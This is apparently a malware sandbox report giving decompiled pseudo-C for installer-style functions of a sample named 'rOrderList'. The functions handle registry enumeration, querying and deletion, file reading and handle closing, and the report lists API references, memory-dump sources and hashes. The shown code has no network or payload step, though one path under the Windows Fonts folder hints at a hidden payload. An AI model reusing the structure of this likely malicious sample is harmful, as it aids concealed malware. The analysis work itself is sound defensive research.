                                                                                      • String ID:
                                                                                      • API String ID: 1092082344-0
                                                                                      • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                                                                      • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
                                                                                      • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                                                                      • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 86%
                                                                                      			E00402596(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                                      				void* _t9;
                                                                                      				int _t10;
                                                                                      				long _t13;
                                                                                      				int* _t16;
                                                                                      				intOrPtr _t21;
                                                                                      				short* _t22;
                                                                                      				void* _t24;
                                                                                      				void* _t26;
                                                                                      				void* _t29;
                                                                                      
                                                                                      				_t22 = __edi;
                                                                                      				_t21 = __edx;
                                                                                      				_t16 = __ebx;
                                                                                      				_t9 = E00402D7E(_t29, 0x20019); // executed
                                                                                      				_t24 = _t9;
                                                                                      				_t10 = E00402D1C(3);
                                                                                      				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                                      				 *__edi = __ebx;
                                                                                      				if(_t24 == __ebx) {
                                                                                      					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                      				} else {
                                                                                      					 *(_t26 + 8) = 0x3ff;
                                                                                      					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                                      						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                      						__eflags = _t13;
                                                                                      						if(_t13 != 0) {
                                                                                      							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                      						}
                                                                                      					} else {
                                                                                      						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
                                                                                      					}
                                                                                      					_t22[0x3ff] = _t16;
                                                                                      					_push(_t24); // executed
                                                                                      					RegCloseKey(); // executed
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t26 - 4));
                                                                                      				return 0;
                                                                                      			}












                                                                                      0x00402596
                                                                                      0x00402596
                                                                                      0x00402596
                                                                                      0x0040259b
                                                                                      0x004025a2
                                                                                      0x004025a4
                                                                                      0x004025ac
                                                                                      0x004025af
                                                                                      0x004025b2
                                                                                      0x00402925
                                                                                      0x004025b8
                                                                                      0x004025c0
                                                                                      0x004025c3
                                                                                      0x004025dc
                                                                                      0x004025e2
                                                                                      0x004025e4
                                                                                      0x004025e6
                                                                                      0x004025e6
                                                                                      0x004025c5
                                                                                      0x004025c9
                                                                                      0x004025c9
                                                                                      0x004025ed
                                                                                      0x004025f4
                                                                                      0x004025f5
                                                                                      0x004025f5
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025DC
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor,00000000,00000011,00000002), ref: 004025F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseValue
                                                                                      • String ID:
                                                                                      • API String ID: 397863658-0
                                                                                      • Opcode ID: 257a32b776eb9a1d35dfbeb4ec07ffba98d4512c6ad98385a6c223297def63ee
                                                                                      • Instruction ID: 6eea7ab82af3d2392c4b6f989cbcf8a15a9c336fd28670f1f8a7e461480f06f5
                                                                                      • Opcode Fuzzy Hash: 257a32b776eb9a1d35dfbeb4ec07ffba98d4512c6ad98385a6c223297def63ee
                                                                                      • Instruction Fuzzy Hash: 88017C71A11604BBEB149FA49E48AAEB77CEF40348F10403AF901B61C0D7B85E40866D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00403B19() {
                                                                                      				void* _t1;
                                                                                      				void* _t2;
                                                                                      				signed int _t11;
                                                                                      
                                                                                      				_t1 =  *0x40a018; // 0xffffffff
                                                                                      				if(_t1 != 0xffffffff) {
                                                                                      					CloseHandle(_t1);
                                                                                      					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                      				}
                                                                                      				_t2 =  *0x40a01c; // 0xffffffff
                                                                                      				if(_t2 != 0xffffffff) {
                                                                                      					CloseHandle(_t2);
                                                                                      					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                      					_t11 =  *0x40a01c;
                                                                                      				}
                                                                                      				E00403B76();
                                                                                      				return E00405C4E(_t11, 0x438000, 7);
                                                                                      			}






                                                                                      0x00403b19
                                                                                      0x00403b28
                                                                                      0x00403b2b
                                                                                      0x00403b2d
                                                                                      0x00403b2d
                                                                                      0x00403b34
                                                                                      0x00403b3c
                                                                                      0x00403b3f
                                                                                      0x00403b41
                                                                                      0x00403b41
                                                                                      0x00403b41
                                                                                      0x00403b48
                                                                                      0x00403b5a

                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2962429428-3355392842
                                                                                      • Opcode ID: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                                                                      • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
                                                                                      • Opcode Fuzzy Hash: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                                                                      • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 92%
                                                                                      			E00403309(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                      				long _v8;
                                                                                      				long _t21;
                                                                                      				long _t22;
                                                                                      				void* _t24;
                                                                                      				long _t26;
                                                                                      				int _t27;
                                                                                      				long _t28;
                                                                                      				void* _t29;
                                                                                      				void* _t30;
                                                                                      				long _t31;
                                                                                      				long _t32;
                                                                                      				long _t36;
                                                                                      
                                                                                      				_t21 = _a4;
                                                                                      				if(_t21 >= 0) {
                                                                                      					_t32 = _t21 +  *0x42a2d8;
                                                                                      					 *0x420ef4 = _t32;
                                                                                      					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                      				}
                                                                                      				_t22 = E00403411(4);
                                                                                      				if(_t22 >= 0) {
                                                                                      					_t24 = E004060B5( *0x40a01c,  &_a4, 4); // executed
                                                                                      					if(_t24 == 0) {
                                                                                      						L18:
                                                                                      						_push(0xfffffffd);
                                                                                      						goto L19;
                                                                                      					} else {
                                                                                      						 *0x420ef4 =  *0x420ef4 + 4;
                                                                                      						_t36 = E00403411(_a4);
                                                                                      						if(_t36 < 0) {
                                                                                      							L21:
                                                                                      							_t22 = _t36;
                                                                                      						} else {
                                                                                      							if(_a12 != 0) {
                                                                                      								_t26 = _a4;
                                                                                      								if(_t26 >= _a16) {
                                                                                      									_t26 = _a16;
                                                                                      								}
                                                                                      								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                      								if(_t27 != 0) {
                                                                                      									_t36 = _v8;
                                                                                      									 *0x420ef4 =  *0x420ef4 + _t36;
                                                                                      									goto L21;
                                                                                      								} else {
                                                                                      									goto L18;
                                                                                      								}
                                                                                      							} else {
                                                                                      								if(_a4 <= 0) {
                                                                                      									goto L21;
                                                                                      								} else {
                                                                                      									while(1) {
                                                                                      										_t28 = _a4;
                                                                                      										if(_a4 >= 0x4000) {
                                                                                      											_t28 = 0x4000;
                                                                                      										}
                                                                                      										_v8 = _t28;
                                                                                      										_t29 = E004060B5( *0x40a01c, 0x414ef0, _t28); // executed
                                                                                      										if(_t29 == 0) {
                                                                                      											goto L18;
                                                                                      										}
                                                                                      										_t30 = E004060E4(_a8, 0x414ef0, _v8); // executed
                                                                                      										if(_t30 == 0) {
                                                                                      											_push(0xfffffffe);
                                                                                      											L19:
                                                                                      											_pop(_t22);
                                                                                      										} else {
                                                                                      											_t31 = _v8;
                                                                                      											_a4 = _a4 - _t31;
                                                                                      											 *0x420ef4 =  *0x420ef4 + _t31;
                                                                                      											_t36 = _t36 + _t31;
                                                                                      											if(_a4 > 0) {
                                                                                      												continue;
                                                                                      											} else {
                                                                                      												goto L21;
                                                                                      											}
                                                                                      										}
                                                                                      										goto L22;
                                                                                      									}
                                                                                      									goto L18;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				L22:
                                                                                      				return _t22;
                                                                                      			}















                                                                                      0x0040330d
                                                                                      0x00403316
                                                                                      0x0040331f
                                                                                      0x00403323
                                                                                      0x0040332e
                                                                                      0x0040332e
                                                                                      0x00403336
                                                                                      0x0040333d
                                                                                      0x0040334f
                                                                                      0x00403356
                                                                                      0x004033fb
                                                                                      0x004033fb
                                                                                      0x00000000
                                                                                      0x0040335c
                                                                                      0x0040335f
                                                                                      0x0040336b
                                                                                      0x0040336f
                                                                                      0x00403409
                                                                                      0x00403409
                                                                                      0x00403375
                                                                                      0x00403378
                                                                                      0x004033d7
                                                                                      0x004033dd
                                                                                      0x004033df
                                                                                      0x004033df
                                                                                      0x004033f1
                                                                                      0x004033f9
                                                                                      0x00403400
                                                                                      0x00403403
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040337a
                                                                                      0x0040337d
                                                                                      0x00000000
                                                                                      0x00403383
                                                                                      0x00403388
                                                                                      0x0040338f
                                                                                      0x00403392
                                                                                      0x00403394
                                                                                      0x00403394
                                                                                      0x004033a1
                                                                                      0x004033a4
                                                                                      0x004033ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004033b4
                                                                                      0x004033bb
                                                                                      0x004033d3
                                                                                      0x004033fd
                                                                                      0x004033fd
                                                                                      0x004033bd
                                                                                      0x004033bd
                                                                                      0x004033c0
                                                                                      0x004033c3
                                                                                      0x004033c9
                                                                                      0x004033cf
                                                                                      0x00000000
                                                                                      0x004033d1
                                                                                      0x00000000
                                                                                      0x004033d1
                                                                                      0x004033cf
                                                                                      0x00000000
                                                                                      0x004033bb
                                                                                      0x00000000
                                                                                      0x00403388
                                                                                      0x0040337d
                                                                                      0x00403378
                                                                                      0x0040336f
                                                                                      0x00403356
                                                                                      0x0040340b
                                                                                      0x0040340e

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                                                                      • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
                                                                                      • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                                                                      • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 84%
                                                                                      			E00402522(int* __ebx, char* __edi) {
                                                                                      				void* _t17;
                                                                                      				short* _t18;
                                                                                      				void* _t35;
                                                                                      				void* _t37;
                                                                                      				void* _t40;
                                                                                      
                                                                                      				_t33 = __edi;
                                                                                      				_t27 = __ebx;
                                                                                      				_t17 = E00402D7E(_t40, 0x20019); // executed
                                                                                      				_t35 = _t17;
                                                                                      				_t18 = E00402D3E(0x33);
                                                                                      				 *__edi = __ebx;
                                                                                      				if(_t35 == __ebx) {
                                                                                      					 *(_t37 - 4) = 1;
                                                                                      				} else {
                                                                                      					 *(_t37 - 0x10) = 0x800;
                                                                                      					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                                      						L7:
                                                                                      						 *_t33 = _t27;
                                                                                      						 *(_t37 - 4) = 1;
                                                                                      					} else {
                                                                                      						if( *(_t37 + 8) == 4) {
                                                                                      							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                                      							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                                      							E00406483(__edi,  *__edi);
                                                                                      						} else {
                                                                                      							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                      								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                                      								_t33[0x7fe] = _t27;
                                                                                      							} else {
                                                                                      								goto L7;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_push(_t35); // executed
                                                                                      					RegCloseKey(); // executed
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *(_t37 - 4);
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x00402522
                                                                                      0x00402522
                                                                                      0x00402527
                                                                                      0x0040252e
                                                                                      0x00402530
                                                                                      0x00402537
                                                                                      0x0040253a
                                                                                      0x00402925
                                                                                      0x00402540
                                                                                      0x00402543
                                                                                      0x0040255e
                                                                                      0x0040258e
                                                                                      0x0040258e
                                                                                      0x00402591
                                                                                      0x00402560
                                                                                      0x00402564
                                                                                      0x0040257d
                                                                                      0x00402584
                                                                                      0x00402587
                                                                                      0x00402566
                                                                                      0x00402569
                                                                                      0x00402574
                                                                                      0x004025ed
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402569
                                                                                      0x00402564
                                                                                      0x004025f4
                                                                                      0x004025f5
                                                                                      0x004025f5
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402553
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor,00000000,00000011,00000002), ref: 004025F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 2ecff7f192670820cc78de32c146e2a447a30c7549f9303db4456cbcd1d2ba57
                                                                                      • Instruction ID: f0d649c8be7bcd6d72a7f6236f3e083c4832147513a68f4e0a15fa01edc77ece
                                                                                      • Opcode Fuzzy Hash: 2ecff7f192670820cc78de32c146e2a447a30c7549f9303db4456cbcd1d2ba57
                                                                                      • Instruction Fuzzy Hash: A4113A71A10209EBDF14DFA4DA589AEB774FF04354B20843BE806B62D0D7B88A45DB5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 69%
                                                                                      			E00401389(signed int _a4, struct HWND__* _a10) {
                                                                                      				intOrPtr* _t6;
                                                                                      				void* _t8;
                                                                                      				void* _t10;
                                                                                      				signed int _t11;
                                                                                      				void* _t12;
                                                                                      				signed int _t16;
                                                                                      				signed int _t17;
                                                                                      
                                                                                      				_t17 = _a4;
                                                                                      				while(_t17 >= 0) {
                                                                                      					_t6 = _t17 * 0x1c +  *0x42a2b0;
                                                                                      					if( *_t6 == 1) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_push(_t6); // executed
                                                                                      					_t8 = E00401434(); // executed
                                                                                      					if(_t8 == 0x7fffffff) {
                                                                                      						return 0x7fffffff;
                                                                                      					}
                                                                                      					_t10 = E0040136D(_t8);
                                                                                      					if(_t10 != 0) {
                                                                                      						_t11 = _t10 - 1;
                                                                                      						_t16 = _t17;
                                                                                      						_t17 = _t11;
                                                                                      						_t12 = _t11 - _t16;
                                                                                      					} else {
                                                                                      						_t12 = _t10 + 1;
                                                                                      						_t17 = _t17 + 1;
                                                                                      					}
                                                                                      					if(_a10 != 0) {
                                                                                      						 *0x42924c =  *0x42924c + _t12;
                                                                                      						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
                                                                                      					}
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}










                                                                                      0x0040138a
                                                                                      0x004013fa
                                                                                      0x0040139b
                                                                                      0x004013a0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004013a2
                                                                                      0x004013a3
                                                                                      0x004013ad
                                                                                      0x00000000
                                                                                      0x00401404
                                                                                      0x004013b0
                                                                                      0x004013b7
                                                                                      0x004013bd
                                                                                      0x004013be
                                                                                      0x004013c0
                                                                                      0x004013c2
                                                                                      0x004013b9
                                                                                      0x004013b9
                                                                                      0x004013ba
                                                                                      0x004013ba
                                                                                      0x004013c9
                                                                                      0x004013cb
                                                                                      0x004013f4
                                                                                      0x004013f4
                                                                                      0x004013c9
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                                                                      • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
                                                                                      • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                                                                      • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040242C(void* __ebx) {
                                                                                      				long _t7;
                                                                                      				void* _t14;
                                                                                      				long _t18;
                                                                                      				intOrPtr _t20;
                                                                                      				void* _t22;
                                                                                      				void* _t23;
                                                                                      
                                                                                      				_t14 = __ebx;
                                                                                      				_t26 =  *(_t23 - 0x20) - __ebx;
                                                                                      				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                                                      				if( *(_t23 - 0x20) != __ebx) {
                                                                                      					_t7 = E00402DFC(_t20, E00402D3E(0x22),  *(_t23 - 0x20) >> 1); // executed
                                                                                      					_t18 = _t7;
                                                                                      					goto L4;
                                                                                      				} else {
                                                                                      					_t22 = E00402D7E(_t26, 2);
                                                                                      					if(_t22 == __ebx) {
                                                                                      						L6:
                                                                                      						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                      					} else {
                                                                                      						_t18 = RegDeleteValueW(_t22, E00402D3E(0x33));
                                                                                      						RegCloseKey(_t22);
                                                                                      						L4:
                                                                                      						if(_t18 != _t14) {
                                                                                      							goto L6;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t23 - 4));
                                                                                      				return 0;
                                                                                      			}









                                                                                      0x0040242c
                                                                                      0x0040242c
                                                                                      0x0040242f
                                                                                      0x00402432
                                                                                      0x0040246e
                                                                                      0x00402473
                                                                                      0x00000000
                                                                                      0x00402434
                                                                                      0x0040243b
                                                                                      0x0040243f
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00402445
                                                                                      0x00402455
                                                                                      0x00402457
                                                                                      0x00402475
                                                                                      0x00402477
                                                                                      0x00000000
                                                                                      0x0040247d
                                                                                      0x00402477
                                                                                      0x0040243f
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040244E
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
